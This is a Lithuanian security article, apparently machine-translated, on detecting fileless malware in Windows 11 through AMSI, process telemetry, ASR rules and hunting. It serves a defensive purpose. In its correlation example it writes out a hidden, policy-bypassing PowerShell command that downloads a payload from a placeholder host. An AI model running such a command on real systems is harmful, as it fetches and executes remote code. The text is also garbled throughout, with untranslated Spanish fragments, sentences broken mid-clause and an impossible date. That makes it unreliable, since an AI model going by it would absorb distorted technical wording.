Kaip aptikti pavojingą be failų kenkėjišką programą sistemoje „Windows 11“

Paskutinis atnaujinimas: 2025-23-11
Autorius: Cristianas Garcia

  • Be failų veikianti kenkėjiška programa veikia atmintyje ir piktnaudžiauja teisėtais procesais, tokiais kaip „PowerShell“ ir WMI.
  • Efektyviam aptikimui reikia stebėti elgesį ir analizuoti atmintį, o ne tik failus.
  • AMSI, procesų telemetrija, paviršiaus mažinimo taisyklės ir aktyvi paieška yra pagrindinės „Windows 11“ funkcijos.
  • Išlikimas WMI, registre ir MBR kartu su programine įranga ir USB išplečia atakų paviršių.

Kaip aptikti pavojingą be failų kenkėjišką programą

¿Kaip aptikti pavojingą be failų kenkėjišką programą? Failų neturinčių atakų aktyvumas gerokai išaugo, o padėtį dar labiau pablogino tai, „Windows 11“ nėra apsaugotaŠis metodas apeina diską ir remiasi atmintimi bei teisėtais sistemos įrankiais; todėl parašais pagrįstos antivirusinės programos sunkiai veikia. Jei ieškote patikimo būdo tai aptikti, atsakymas slypi derinant telemetrija, elgsenos analizė ir „Windows“ valdikliai.

Dabartinėje ekosistemoje kampanijos, kurios piktnaudžiauja „PowerShell“, WMI arba „Mshta“, egzistuoja kartu su sudėtingesnėmis technikomis, tokiomis kaip atminties injekcijos, išsaugojimas „neliečiant“ disko ir netgi programinės įrangos piktnaudžiavimaiSvarbiausia suprasti grėsmių žemėlapį, atakų fazes ir kokius signalus jos palieka, net kai viskas vyksta RAM atmintyje.

Kas yra be failų kenkėjiška programa ir kodėl ji kelia susirūpinimą sistemoje „Windows 11“?

Kalbėdami apie „befailes“ grėsmes, turime omenyje kenkėjišką kodą, kuris Jums nereikia įkelti naujų vykdomųjų failų. failų sistemoje, kad veiktų. Paprastai jis įterpiamas į veikiančius procesus ir vykdomas RAM atmintyje, naudojant „Microsoft“ pasirašytus interpretatorius ir dvejetainius failus (pvz., „PowerShell“, WMI, „rundll32“, „mshta“Tai sumažina jūsų pėdsaką ir leidžia apeiti variklius, kurie ieško tik įtartinų failų.

Netgi biuro dokumentai ar PDF failai, kurie išnaudoja pažeidžiamumus komandoms paleisti, laikomi šio reiškinio dalimi, nes aktyvuoti vykdymą atmintyje nepaliekant naudingų dvejetainių failų analizei. Piktnaudžiavimas makrokomandos ir DDE „Office“ sistemoje, nes kodas veikia teisėtuose procesuose, tokiuose kaip „WinWord“.

Užpuolikai derina socialinę inžineriją (sukčiavimą, šlamšto nuorodas) su techniniais spąstais: vartotojo spustelėjimas inicijuoja grandinę, kurioje scenarijus atsisiunčia ir vykdo galutinį atmintyje esantį paketą, vengiant palikti pėdsaką diske. Tikslai svyruoja nuo duomenų vagystės iki išpirkos reikalaujančių programų vykdymo ir tylaus judėjimo į šoną.

Kenkėjiškų programų aptikimas be failų

Tipologijos pagal sistemos poveikį: nuo „grynos“ iki hibridinių

Siekiant išvengti painiavos sąvokų, naudinga atskirti grėsmes pagal jų sąveikos su failų sistema laipsnį. Ši kategorizacija paaiškina kas išlieka, kur gyvena kodas ir kokius ženklus jis palieka?.

I tipas: nėra failų veiklos

Visiškai failų neturinti kenkėjiška programa nieko neįrašo į diską. Klasikinis pavyzdys yra išnaudojimas tinklo pažeidžiamumas (kaip ir „EternalBlue“ vektorius anksčiau), kad būtų įgyvendintas galinis durų elementas, esantis branduolio atmintyje (pvz., „DoublePulsar“). Čia viskas vyksta RAM atmintyje ir failų sistemoje nėra jokių artefaktų.

Kitas variantas – užteršti firmware komponentų: BIOS/UEFI, tinklo adapterių, USB periferinių įrenginių („BadUSB“ tipo metodų) ar net CPU posistemių. Jie išlieka ir po perkrovimo bei pakartotinio diegimo, o tai dar labiau apsunkina Nedaug produktų tikrina programinę įrangąTai sudėtingos atakos, retesnės, bet pavojingos dėl savo slaptumo ir ilgaamžiškumo.

II tipas: Netiesioginė archyvavimo veikla

Čia kenkėjiška programa „nepalieka“ savo vykdomojo failo, bet naudoja sistemos valdomus konteinerius, kurie iš esmės saugomi kaip failai. Pavyzdžiui, užpakalinės durys, kurios įterpia comandos de PowerShell WMI saugykloje ir suaktyvinti jos vykdymą naudojant įvykių filtrus. Ją galima įdiegti iš komandinės eilutės neištrinant dvejetainių failų, tačiau WMI saugykla yra diske kaip teisėta duomenų bazė, todėl ją sunku išvalyti nepaveikiant sistemos.

Praktiškai jie laikomi befailiniais, nes tas konteineris (WMI, registras ir kt.) Tai nėra klasikinis aptinkamas vykdomasis failas Ir jo valymas nėra trivialus. Rezultatas: slaptas atkaklumas su mažais „tradicinių“ pėdsakais.

Išskirtinis turinys – spustelėkite čia  ¿Cómo habilitar la opción de verificación en dos pasos con Discord?

III tipas: Reikalingi failai, kad veiktų

Kai kuriais atvejais išlaikoma „be failų“ išlikimas Loginiu lygmeniu jiems reikalingas failo pagrindu veikiantis trigeris. Tipiškas pavyzdys yra „Kovter“: jis užregistruoja apvalkalo veiksmažodį atsitiktiniam plėtiniui; atidarius failą su tuo plėtiniu, paleidžiamas nedidelis scenarijus, naudojant „mshta.exe“, kuris rekonstruoja kenkėjišką eilutę iš registro.

Gudrybė ta, kad šie „masalo“ failai su atsitiktiniais plėtiniais neturi analizuojamo turinio, o didžioji kodo dalis yra Įrašas (kitas konteineris). Štai kodėl jie priskiriami befailiniams pagal poveikį, nors griežtai kalbant, jie priklauso nuo vieno ar kelių disko artefaktų kaip trigerio.

Infekcijos vektoriai ir „šeimininkai“: kur ji patenka ir kur slepiasi

Siekiant pagerinti aptikimą, labai svarbu nustatyti patekimo tašką ir infekcijos šeimininką. Ši perspektyva padeda planuoti specifiniai valdikliai Teikite pirmenybę tinkamai telemetrijai.

Exploits

  • Failų pagrindu (III tipas): Dokumentai, vykdomieji failai, seni „Flash“ / „Java“ failai arba LNK failai gali išnaudoti naršyklės arba juos apdorojančio variklio spragas, kad į atmintį įkeltų apvalkalinį kodą. Pirmasis vektorius yra failas, bet naudinga apkrova keliauja į RAM.
  • Tinklo pagrindu (I tipas): Paketas, išnaudojantis pažeidžiamumą (pvz., SMB), pasiekia vykdymą vartotojo aplinkoje arba branduolyje. „WannaCry“ išpopuliarino šį metodą. Tiesioginė atminties apkrova be naujo failo.

Aparatūra

  • Dispositivos (I tipas): Disko arba tinklo plokštės programinę-aparatinę įrangą galima pakeisti ir įdiegti kodą. Sunku patikrinti ir išlieka už OS ribų.
  • CPU ir valdymo posistemės (I tipas): Tokios technologijos kaip „Intel“ ME/AMT parodė būdus, kaip Tinklo kūrimas ir vykdymas už OS ribųJis puola labai žemu lygiu, turėdamas didelį potencialą slaptam veikimui.
  • USB (I tipas): „BadUSB“ leidžia perprogramuoti USB atmintinę, kad ji apsimestų klaviatūra arba tinklo plokšte ir paleistų komandas arba nukreiptų srautą.
  • BIOS/UEFI (I tipas): kenkėjiška programinės įrangos perprogramavimas (pvz., „Mebromi“), kuris paleidžiamas prieš paleidžiant „Windows“.
  • Hypervisor (I tipas): Mini hipervizoriaus įdiegimas po OS, siekiant paslėpti jo buvimą. Retas, bet jau pastebėtas hipervizoriaus rootkit'ų pavidalu.

Vykdymas ir injekcija

  • Failų pagrindu (III tipas): EXE/DLL/LNK arba suplanuotos užduotys, kurios paleidžia injekcijas į teisėtus procesus.
  • Macros (III tipas): VBA „Office“ programoje gali dekoduoti ir vykdyti naudingąją apkrovą, įskaitant visišką išpirkos reikalaujančią programinę įrangą, gavus vartotojo sutikimą apgaulės būdu.
  • Scripts (II tipas): „PowerShell“, „VBScript“ arba „JScript“ iš failo, komandinės eilutės, paslaugos, registracija arba WMIUžpuolikas gali įvesti scenarijų nuotolinės sesijos metu neliesdamas disko.
  • Įkrovos įrašas (MBR/įkrova) (II tipas): Tokios šeimos kaip „Petya“ perrašo įkrovos sektorių, kad perimtų valdymą paleidimo metu. Jis yra už failų sistemos ribų, bet prieinamas OS ir šiuolaikiniams sprendimams, kurie gali jį atkurti.

Kaip veikia atakos be failų: etapai ir signalai

Nors kampanijos nepalieka vykdomųjų failų, jos vykdomos etapais. Jų supratimas leidžia stebėti. įvykiai ir procesai tarp jų kurie palieka žymę.

  • Pradinė prieigaSukčiavimo apsimetant atakos naudojant nuorodas ar priedus, pažeistas svetaines arba pavogtus prisijungimo duomenis. Daugelis atakų prasideda „Office“ dokumentu, kuris suaktyvina komandą. PowerShell.
  • Atkaklumas: užpakalinės durys per WMI (filtrai ir prenumeratos), Registro vykdymo raktai arba suplanuotos užduotys, kurios iš naujo paleidžia scenarijus be naujo kenkėjiško failo.
  • EksfiltracijaSurinkus informaciją, ji siunčiama iš tinklo naudojant patikimus procesus (naršykles, „PowerShell“, „bitsadmin“), kad būtų sumaišytas srautas.

Šis modelis yra ypač klastingas, nes atakos rodikliai Jie slepiasi įprastame pasaulyje: komandinės eilutės argumentuose, procesų grandinėje, anomaliai siunčiamuose ryšiuose arba prieigoje prie injekcijos API.

Įprasti metodai: nuo atminties iki įrašymo

Aktoriai remiasi įvairiais aspektais métodos kurie optimizuoja slaptą veikimą. Norint suaktyvinti veiksmingą aptikimą, naudinga žinoti dažniausiai pasitaikančius.

  • Gyventojas atmintyjeNaudingųjų apkrovų įkėlimas į patikimo proceso, kuris laukia aktyvinimo, erdvę. rootkitai ir kabliukai Branduolyje jie padidina slėpimo lygį.
  • Išlikimas registreIšsaugokite užšifruotus „blob“ raktuose ir rehidratuokite juos iš teisėto paleidimo įrenginio („mshta“, „rundll32“, „wscript“). Trumpalaikė diegimo programa gali save sunaikinti, kad sumažintų savo pėdsaką.
  • Sukčiavimas kredencialų duomenimisNaudodamas pavogtus vartotojo vardus ir slaptažodžius, užpuolikas vykdo nuotolinius apvalkalus ir diegia tyli prieiga registre arba WMI.
  • „Be failų“ išpirkos reikalaujanti programaŠifravimas ir C2 ryšys yra valdomi iš RAM atminties, todėl sumažėja aptikimo galimybės, kol žala tampa matoma.
  • Operaciniai rinkiniai: automatizuotos grandinės, kurios aptinka pažeidžiamumus ir, vartotojui spustelėjus, diegia tik atmintyje saugomus naudinguosius duomenis.
  • Dokumentai su kodumakrokomandos ir mechanizmai, tokie kaip DDE, kurie aktyvuoja komandas neįrašant vykdomųjų failų į diską.
Išskirtinis turinys – spustelėkite čia  Cómo evitar los firewalls corporativos

Pramonės tyrimai jau parodė pastebimus šuolius: vienu 2018 m. laikotarpiu padidėjimas daugiau nei 90 % scenarijų pagrindu sukurtose ir „PowerShell“ grandininėse atakose tai ženklas, kad vektorius yra pageidaujamas dėl savo efektyvumo.

Iššūkis įmonėms ir tiekėjams: kodėl blokavimo nepakanka

Būtų pagunda išjungti „PowerShell“ arba uždrausti makrokomandas visam laikui, bet Jūs sugriautumėte operaciją„PowerShell“ yra šiuolaikinio administravimo ramstis, o „Office“ yra būtinas versle; aklai jo blokuoti dažnai nėra įmanoma.

Be to, yra būdų, kaip apeiti pagrindinius valdiklius: paleisti „PowerShell“ per DLL ir rundll32, pakuoti scenarijus į EXE failus, Atsineškite savo „PowerShell“ kopiją arba net paslėpti scenarijus vaizduose ir išgauti juos į atmintį. Todėl gynyba negali būti grindžiama vien įrankių egzistavimo neigimu.

Kita dažna klaida – viso sprendimo delegavimas debesijai: jei agentas turi laukti atsakymo iš serverio, Prarandate realaus laiko prevencijąTelemetrijos duomenis galima įkelti, kad būtų galima praturtinti informaciją, tačiau Švelninimas turi vykti galutiniame taške.

Kaip aptikti failų neturinčią kenkėjišką programą sistemoje „Windows 11“: telemetrija ir elgesys

Laimėjimo strategija yra stebėti procesus ir atmintįNe failai. Kenkėjiškas elgesys yra stabilesnis nei failų formos, todėl idealiai tinka prevencijos sistemoms.

  • AMSI (apsaugos nuo kenkėjiškų programų nuskaitymo sąsaja)Jis perima „PowerShell“, „VBScript“ arba „JScript“ scenarijus, net kai jie yra dinamiškai kuriami atmintyje. Puikiai tinka užmaskuotoms eilutėms užfiksuoti prieš jų vykdymą.
  • Proceso stebėsena: startas/finišas, PID, tėvai ir vaikai, maršrutai, komandų eilutės ir maišos, taip pat vykdymo medžiai, kad suprastumėte visą istoriją.
  • Atminties analizėĮpurškimų, atspindinčių arba PE apkrovų aptikimas neliečiant disko ir neįprastų vykdomųjų sričių peržiūra.
  • Starterių sektoriaus apsaugaMBR/EFI kontrolė ir atkūrimas neteisėto keitimo atveju.

„Microsoft“ ekosistemoje „Defender for Endpoint“ apjungia AMSI, elgesio stebėjimasAtminties nuskaitymas ir debesijos pagrindu veikiantis mašininis mokymasis naudojami aptikimo mastui, siekiant nustatyti naujus arba užmaskuotus variantus. Kiti tiekėjai taiko panašius metodus su branduolio varikliukais.

Realus koreliacijos pavyzdys: nuo dokumento iki „PowerShell“

Įsivaizduokite grandinę, kurioje „Outlook“ atsisiunčia priedą, „Word“ atidaro dokumentą, įjungiamas aktyvus turinys ir paleidžiama „PowerShell“ su įtartinais parametrais. Tinkama telemetrija parodytų... línea de comandos (pvz., „ExecutionPolicy Bypass“, paslėptas langas), prisijungimas prie nepatikimo domeno ir antrinio proceso, kuris įsidiegia „AppData“, sukūrimas.

Agentas, turintis vietinį kontekstą, gali sustoti ir atbulinė eiga kenkėjiška veikla be rankinio įsikišimo, be pranešimo SIEM sistemai arba el. paštu / SMS žinute. Kai kurie produktai prideda pagrindinės priežasties priskyrimo sluoksnį („StoryLine“ tipo modeliai), kuris nurodo ne į matomą procesą („Outlook“ / „Word“), o į visiškai kenkėjiška gija ir jos kilmę, kad būtų galima visapusiškai išvalyti sistemą.

Tipiškas komandų šablonas, į kurį reikia atkreipti dėmesį, gali atrodyti taip: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logika nėra tiksli eilutė, bet signalų rinkinys: politikos apėjimas, paslėptas langas, aiškus atsisiuntimas ir vykdymas atmintyje.

AMSI, srautas ir kiekvieno veikėjo vaidmuo: nuo galinio taško iki SOC

Be scenarijų fiksavimo, tvirta architektūra organizuoja veiksmus, kurie palengvina tyrimą ir reagavimą. Kuo daugiau įrodymų prieš atliekant apkrovą, tuo geriau., mejor.

  • Scenarijaus perėmimasAMSI pateikia turinį (net jei jis generuojamas operatyviai) statinei ir dinaminei analizei kenkėjiškų programų sraute.
  • Proceso įvykiaiRenkami PID, dvejetainiai failai, maišos, maršrutai ir kiti duomenys. argumentos, nustatant procesų medžius, kurie lėmė galutinį apkrovimą.
  • Aptikimas ir ataskaitų teikimasAptikimai rodomi produkto konsolėje ir persiunčiami tinklo platformoms (NDR) kampanijos vizualizavimui.
  • Vartotojo garantijosNet jei scenarijus įterpiamas į atmintį, sistema AMSI jį perima suderinamose „Windows“ versijose.
  • Administratoriaus galimybės: politikos konfigūracija, skirta įgalinti scenarijų patikrinimą, elgesiu pagrįstas blokavimas ir ataskaitų kūrimas iš konsolės.
  • SOC darbas: artefaktų (VM UUID, OS versijos, scenarijaus tipo, iniciatoriaus proceso ir jo tėvinio proceso, maišos kodų ir komandų eilučių) išgavimas, siekiant atkurti istoriją ir kėlimo taisyklės futuras.
Išskirtinis turinys – spustelėkite čia  ¿Cómo se deshabilita la autenticación de dos pasos con la aplicación de autenticación de Google?

Kai platforma leidžia eksportuoti atminties buferis Kartu su vykdymu tyrėjai gali generuoti naujus aptikimus ir praturtinti apsaugą nuo panašių variantų.

Praktinės priemonės sistemoje „Windows 11“: prevencija ir medžioklė

Teisingai įdiekite „Windows 11“ 2025 m.

Be EDR su atminties tikrinimu ir AMSI, „Windows 11“ leidžia uždaryti atakų spragas ir pagerinti matomumą naudojant vietiniai valdikliai.

  • Registracija ir apribojimai „PowerShell“ programojeĮgalina scenarijų blokų ir modulių registravimą, taiko ribojamus režimus, kai įmanoma, ir kontroliuoja naudojimą Apėjimas/Paslėptas.
  • Atakos paviršiaus mažinimo (ASR) taisyklės: blokuoja „Office“ procesų vykdomus scenarijų paleidimus ir WMI piktnaudžiavimas/PSExec, kai nereikia.
  • „Office“ makrokomandų politikos: pagal numatytuosius nustatymus išjungia vidinį makrokomandų pasirašymą ir griežtus patikimumo sąrašus; stebi senesnius DDE srautus.
  • WMI auditas ir registras: stebi įvykių prenumeratas ir automatinio vykdymo raktus („Run“, „RunOnce“, „Winlogon“), taip pat užduočių kūrimą suplanuota.
  • Paleidimo apsauga: aktyvuoja saugų paleidimą, patikrina MBR/EFI vientisumą ir patvirtina, kad paleidimo metu nėra jokių pakeitimų.
  • Lopymas ir grūdinimas: pašalina naršyklių, „Office“ komponentų ir tinklo paslaugų pažeidžiamumus, kuriuos galima išnaudoti.
  • Suvokimas: apmoko naudotojus ir technines komandas sukčiavimo apsimetant ir signalizuojant apie sukčiavimą slaptos egzekucijos.

Ieškodami užklausų, sutelkite dėmesį į: procesų kūrimą naudojant „Office“ pagal „PowerShell“ / MSHTA, argumentus su atsisiuntimo eilutė / atsisiuntimo failasSkriptai su aiškiu užmaskavimu, atspindinčiomis injekcijomis ir išeinančiais tinklais į įtartinus aukščiausio lygio domenus. Kryžmiškai susiekite šiuos signalus su reputacija ir dažnumu, kad sumažintumėte triukšmą.

Ką šiandien gali aptikti kiekvienas variklis?

„Microsoft“ įmonių sprendimai apjungia AMSI, elgsenos analizę, ištirti atmintį ir įkrovos sektoriaus apsaugą, taip pat debesijos pagrindu veikiančius mašininio mokymosi modelius, skirtus kovai su kylančiomis grėsmėmis. Kiti tiekėjai diegia branduolio lygio stebėjimą, kad atskirtų kenkėjišką programinę įrangą nuo gerybinės, automatiškai atšaukdami pakeitimus.

Metodas, pagrįstas egzekucijos istorijos Tai leidžia nustatyti pagrindinę priežastį (pavyzdžiui, „Outlook“ priedą, kuris suaktyvina grandinę) ir sušvelninti viso medžio poveikį: scenarijus, raktus, užduotis ir tarpinius dvejetainius failus, išvengiant užstrigimo ties matomu simptomu.

Dažnos klaidos ir kaip jų išvengti

Kaip išvalyti „Windows“ registrą nieko nesugadinant

„PowerShell“ blokavimas be alternatyvaus valdymo plano yra ne tik nepraktiškas, bet ir turi būdai, kaip tai netiesiogiai sukeltiTas pats pasakytina ir apie makrokomandas: arba jas valdote naudodami strategijas ir parašus, arba nukentės verslas. Geriau sutelkti dėmesį į telemetriją ir elgesio taisykles.

Kita dažna klaida – manyti, kad programų įtraukimas į baltąjį sąrašą išsprendžia viską: būtent tuo ir remiasi technologija be failų. patikimos programosKontrolė turėtų stebėti, ką jie daro ir kaip jie yra susiję, o ne tik tai, ar jiems leidžiama.

Atsižvelgiant į visa tai, kas išdėstyta pirmiau, failų neturinti kenkėjiška programa nustoja būti „vaiduokliu“, kai stebite tai, kas iš tikrųjų svarbu: elgesys, atmintis ir kilmė kiekvieno vykdymo. AMSI, išsamios procesų telemetrijos, vietinių „Windows 11“ valdiklių ir EDR sluoksnio su elgsenos analize derinys suteikia jums pranašumą. Pridėkite prie lygties realias makrokomandų ir „PowerShell“ politikas, WMI / registro auditą ir medžioklę, kuri teikia pirmenybę komandų eilutėms ir procesų medžiams, ir turėsite apsaugą, kuri nutraukia šias grandines, kol jos dar nepasireiškė.

Susijęs straipsnis:
Redes Informáticas